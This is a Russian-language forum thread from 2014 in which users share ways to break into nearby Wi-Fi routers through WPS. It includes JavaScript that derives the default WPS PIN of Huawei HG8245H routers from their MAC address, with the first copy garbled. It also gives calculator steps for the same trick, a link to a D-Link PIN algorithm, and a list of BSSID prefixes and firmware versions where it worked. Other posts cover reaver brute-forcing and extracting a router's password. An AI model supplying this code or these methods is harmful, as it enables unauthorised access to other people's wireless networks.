 |
|
13.12.2014, 16:00
|
|
Постоянный
Регистрация: 21.09.2013
Сообщений: 394
С нами:
6653846
Репутация:
0
|
|
Существует ли сейчас рабочий метод возвращения роутера из wps-блокировки? mdk3 уже не помогает, а всяких tp-link'ов вокруг дофига...
|
|
|
13.12.2014, 16:55
|
|
Постоянный
Регистрация: 06.05.2013
Сообщений: 534
С нами:
6852566
Репутация:
2
|
|
Сообщение от lom1989
Всем привет,пользовался airslax(reaver) и вот что получилось
WPS PIN 00000000
WPA PSK 1ysa3pjdys20hfhr420 ur9nkicur1j
AP SID SEC linkshare 861903
По даному паролю подключать не хочет,может его надо перевести по какомуто алгоитму?
Подключайся по пину...
|
|
|
|
14.12.2014, 04:18
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
С нами:
8115446
Репутация:
125
|
|
А я вот нашёл алгоритм генерации пин кода из MAC-адреса для роутера Huawei HG8245H.
Обнаружил его в коде веб интерфейса, он на JavaScript
Пример использования:
computeDefaultPin('20:0B:C7:C9:6E:94')
[CODE]
// According to wlanmac, calculate initial PIN code, algorithm HW_WLAN_CalWpsDefaultPin is the same
function computeDefaultPin(wlanMac)
{
var mac = '';
var temp = 0;
var macnum = 0;
var pin = 0;
var defaultpin = 0;
// Check wlanmac legitimacy
if ((wlanMac == '') || (wlanMac == '00:00:00:00:00:00') || (wlanMac == 'FF:FF:FF:FF:FF:FF'))
{
alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
}
// Remove : symbols from wlanmac
for (var i = 0; i = (mac.length - 7); j--)
{
temp = parseInt(mac.charCodeAt(j));
if ((temp >= 97) && (temp = 65) && (temp = 48) && (temp
|
|
|
|
14.12.2014, 14:52
|
|
Постоянный
Регистрация: 24.07.2013
Сообщений: 362
С нами:
6738806
Репутация:
19
|
|
Сообщение от binarymaster
А я вот нашёл алгоритм генерации пин кода из MAC-адреса для роутера Huawei HG8245H.
Обнаружил его в коде веб интерфейса, он на JavaScript
Пример использования:
computeDefaultPin('20:0B:C7:C9:6E:94')
Код:
// According to wlanmac, calculate initial PIN code, algorithm HW_WLAN_CalWpsDefaultPin is the same
function computeDefaultPin(wlanMac)
{
var mac = '';
var temp = 0;
var macnum = 0;
var pin = 0;
var defaultpin = 0;
// Check wlanmac legitimacy
if ((wlanMac == '') || (wlanMac == '00:00:00:00:00:00') || (wlanMac == 'FF:FF:FF:FF:FF:FF'))
{
alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
}
// Remove : symbols from wlanmac
for (var i = 0; i < wlanMac.length; )
{
mac += wlanMac.substr(i,2);
i += 3;
}
// Take wlanmac after 7 bits and convert it to 10 hexadecimal
for (var j = (mac.length - 1); j >= (mac.length - 7); j--)
{
temp = parseInt(mac.charCodeAt(j));
if ((temp >= 97) && (temp <= 102)) //abcdef
{
temp = (temp - 97) + 10;
}
else if ((temp >= 65) && (temp <= 70)) //ABCDEF
{
temp = (temp - 65) + 10;
}
else if ((temp >= 48) && (temp <= 57)) //0123456789
{
temp = temp - 48;
}
else
{
alert(cfg_wlancfgdetail_language['amp_wlanmac_invaild']);
}
temp = temp * Math.pow(16, mac.length - j - 1);
macnum += temp;
}
pin = macnum % 10000000;
if (pin == 0)
{
pin = 1234567;
}
// Add checksum
defaultpin = pin * 10 + ComputeChecksum(pin);
return defaultpin;
}
Круто, в инете прочел, что такие роутеры ставит МГТС для своего GPON. Странно, что у меня в округе только sercomm и intercross.
|
|
|
|
14.12.2014, 16:03
|
|
Member
Регистрация: 04.06.2013
Сообщений: 169
С нами:
6810806
Репутация:
0
|
|
Сообщение от Vikhedgehog
Круто, в инете прочел, что такие роутеры ставит МГТС для своего GPON. Странно, что у меня в округе только sercomm и intercross.
его ставили в 2012-2013,потом ему на смену пришел серком....
http://www.mgts.ru/upload/images/f/1/home/internet/equipment/modems/Huawei HG8245.pdf
|
|
|
|
25.12.2014, 01:21
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2013
Сообщений: 1,113
С нами:
6902966
Репутация:
57
|
|
Делаем скрипт выше на калькуляторе!
Имеем BSSID - F8:4A:BF:E1:08:EC
Открываем калькулятор и выбираем вид - программист.
Выбираем HEX. Ставим 4 или 8 байт. Вводим FE108EC.
Выбираем DEC. Жмем кнопку 'Mod' вводим с клавиатуры 10 000 000 (без пробелов) и жмем 'Enter' - Готово!
   
P.S. для BSSID 90:94:E4:F0:3B:F0 с пином 5743984 делаем тоже-самое но с F03BF0! |
|
|
|
25.12.2014, 07:30
|
|
Участник форума
Регистрация: 11.06.2012
Сообщений: 107
С нами:
7326326
Репутация:
1
|
|
Алгоритм генерации пин кода, к некоторым роутерам D-Link.
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
|
|
|
|
25.12.2014, 10:44
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2013
Сообщений: 1,113
С нами:
6902966
Репутация:
57
|
|
Сообщение от RomanxD
Алгоритм генерации пин кода, к некоторым роутерам D-Link.
http://www.devttys0.com/2014/10/reversing-d-links-wps-pin-algorithm/
Работает. Спасибо.
Те что подошли у меня.
BSSID
Код:
00:01:23:45:XX:XX 00:14:D1:60:XX:XX 00:14:D1:6E:XX:XX
00:14:D1:E1:XX:XX 00:14:D1:E6:XX:XX 00:18:E7:C4:XX:XX
00:18:E7:C8:XX:XX 00:18:E7:D0:XX:XX 00:18:E7:D2:XX:XX
00:18:E7:E1:XX:XX 00:18:E7:E3:XX:XX 00:18:E7:E4:XX:XX
00:18:E7:E6:XX:XX 00:18:E7:E8:XX:XX 00:18:E7:EA:XX:XX
00:18:E7:EC:XX:XX 00:18:E7:ED:XX:XX 00:18:E7:EE:XX:XX
00:18:E7:EF:XX:XX 00:18:E7:F0:XX:XX 00:18:E7:F1:XX:XX
00:18:E7:F2:XX:XX 00:18:E7:F3:XX:XX 00:18:E7:F4:XX:XX
00:18:E7:F7:XX:XX 00:18:E7:FA:XX:XX 00:18:E7:FC:XX:XX
00:18:E7:FD:XX:XX 00:18:E7:FE:XX:XX 00:19:5B:60:XX:XX
00:1C:F0:66:XX:XX 00:1C:F0:B8:XX:XX 00:1C:F0:F7:XX:XX
00:1E:58:00:XX:XX 00:1E:58:FB:XX:XX 00:21:91:08:XX:XX
00:21:91:0A:XX:XX 00:21:91:0D:XX:XX 00:21:91:14:XX:XX
00:21:91:18:XX:XX 00:21:91:D4:XX:XX 00:21:91:EE:XX:XX
00:21:91:F6:XX:XX 00:21:91:FE:XX:XX 00:22:B0:B2:XX:XX
00:22:B0:B3:XX:XX 00:22:B0:B4:XX:XX 00:22:B0:B5:XX:XX
00:24:01:28:XX:XX 00:24:01:2D:XX:XX 00:24:01:41:XX:XX
00:24:01:F1:XX:XX 00:26:5A:C3:XX:XX 00:26:5A:CC:XX:XX
00:26:5A:CF:XX:XX 00:26:5A:F5:XX:XX 00:26:5A:F9:XX:XX
00:98:98:98:XX:XX 14:D6:4D:2C:XX:XX 14:D6:4D:2D:XX:XX
14:D6:4D:2E:XX:XX 14:D6:4D:35:XX:XX 14:D6:4D:37:XX:XX
1C:7E:E5:31:XX:XX 1C:7E:E5:34:XX:XX 1C:7E:E5:38:XX:XX
1C:7E:E5:39:XX:XX 1C:7E:E5:3E:XX:XX 1C:7E:E5:40:XX:XX
1C:7E:E5:41:XX:XX 1C:7E:E5:43:XX:XX 1C:7E:E5:45:XX:XX
1C:7E:E5:4A:XX:XX 1C:7E:E5:4B:XX:XX 34:08:04:E0:XX:XX
34:08:04:E1:XX:XX 5C:D9:98:60:XX:XX 5C:D9:98:65:XX:XX
5C:D9:98:66:XX:XX 5C:D9:98:67:XX:XX 84:C9:B2:49:XX:XX
84:C9:B2:4A:XX:XX 84:C9:B2:4C:XX:XX 84:C9:B2:4D:XX:XX
84:C9:B2:4F:XX:XX 84:C9:B2:51:XX:XX 84:C9:B2:52:XX:XX
84:C9:B2:53:XX:XX 84:C9:B2:54:XX:XX 84:C9:B2:57:XX:XX
84:C9:B2:59:XX:XX 84:C9:B2:5A:XX:XX 84:C9:B2:5F:XX:XX
84:C9:B2:62:XX:XX 84:C9:B2:64:XX:XX 84:C9:B2:6C:XX:XX
84:C9:B2:6D:XX:XX B8:A3:86:50:XX:XX B8:A3:86:65:XX:XX
C8:BE:19:70:XX:XX C8:BE:19:71:XX:XX C8:D3:A3:57:XX:XX
C8:D3:A3:5E:XX:XX C8:D3:A3:66:XX:XX CC:B2:55:D5:XX:XX
Код:
D-Link firmware: 2.09WW
D-Link firmware: 3.03RU
D-Link DIR-615, firmware: 5.11RU
D-Link DIR-400, firmware: 1.03
D-Link DIR-615, firmware: 3.03RU
D-Link DIR-615, firmware: 5.10
D-Link DIR-615, firmware: 5.10RU
D-Link DIR-615, firmware: 5.11NV
D-Link DIR-615, firmware: 5.11RU
D-Link DIR-615, hardware: B2, firmware: 2.23
D-Link DIR-615, hardware: B2, firmware: 2.25
D-Link DIR-615, hardware: B2, firmware: 2.26
D-Link DIR-615, hardware: B2, firmware: 2.27
D-Link DIR-615, hardware: E4, firmware: 5.11RU
D-Link DIR-628, hardware: A2, firmware: 1.24
D-Link DIR-628, hardware: A2, firmware: 1.25
D-Link DIR-635, hardware: B1, firmware: 2.21
D-Link DIR-635, hardware: B1, firmware: 2.33
D-Link DIR-655, firmware: 2.00
D-Link DIR-655, firmware: 2.00RU
D-Link DIR-655, hardware: A1/A2, firmware: 1.33
D-Link DIR-655, hardware: A2, firmware: 1.35
D-Link DIR-655, hardware: A3, firmware: 1.11
D-Link DIR-655, hardware: A3, firmware: 1.21
D-Link DIR-655, hardware: A3, firmware: 1.35
D-Link DIR-655, hardware: A4, firmware: 1.21
D-Link DIR-655, hardware: A4, firmware: 1.30
D-Link DIR-655, hardware: A4, firmware: 1.32
D-Link DIR-655, hardware: A4, firmware: 1.33
D-Link DIR-655, hardware: A4, firmware: 1.34
D-Link DIR-655, hardware: A4, firmware: 1.35
D-Link DIR-825, firmware: 2.05WW
D-Link DIR-825, firmware: 2.06WW
D-Link DIR-825, firmware: 2.09WW
D-Link DIR-855, hardware: A2, firmware: 1.23
D-Link DIR-855, hardware: A2, firmware: 1.24
D-Link DIR-857, firmware: 1.00
D-Link DIR-857, firmware: 1.01RU
TRENDnet firmware: 1.10
TRENDnet TEW-652BRP, firmware: 1.10
TRENDnet TEW-673GRU, firmware: 1.00
dlink DIR-826L, firmware: 1.00RUb07
dlink DIR-826L, firmware: 1.01RUb01beta01
dlink DIR-826L, firmware: 1.01RUb01beta02
dlink DIR-826L, firmware: 1.01RUb01beta04
|
|
|
|
25.12.2014, 15:39
|
|
Постоянный
Регистрация: 21.09.2013
Сообщений: 394
С нами:
6653846
Репутация:
0
|
|
Мучаю один роутер (D-Link судя по маку), три раза запускал полный перебор и три раза reaver выдавал разные, но близкие результаты (44409845, 44409920, 44410087), когда перебор заканчивается строчки WPS PSK нету. Попытка подключится по пину результатов не принесла. Как можно добить эту точку чтобы вытянуть из неё пароль?
|
|
|
|
25.12.2014, 15:57
|
|
Флудер
Регистрация: 11.12.2010
Сообщений: 4,688
С нами:
8115446
Репутация:
125
|
|
Сообщение от VladimirV
Делаем скрипт выше на калькуляторе!
Имеем BSSID - F8:4A:BF:E1:08:EC
Открываем калькулятор и выбираем вид - программист.
Выбираем HEX. Ставим 4 или 8 байт. Вводим FE108EC.
Выбираем DEC. Жмем кнопку 'Mod' вводим с клавиатуры 10 000 000 (без пробелов) и жмем 'Enter' - Готово!
Это для Huawei? Хм... в сравнении со скриптом, который я постил выше, результаты отличаются, либо я что-то делаю не так
Сообщение от VladimirV
P.S. для BSSID 90:94:E4:F0:3B:F0 с пином 5743984 делаем тоже-самое но с F03BF0!
Это D-Link DIR-620, у него самый обычный алгоритм 16 к 10.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
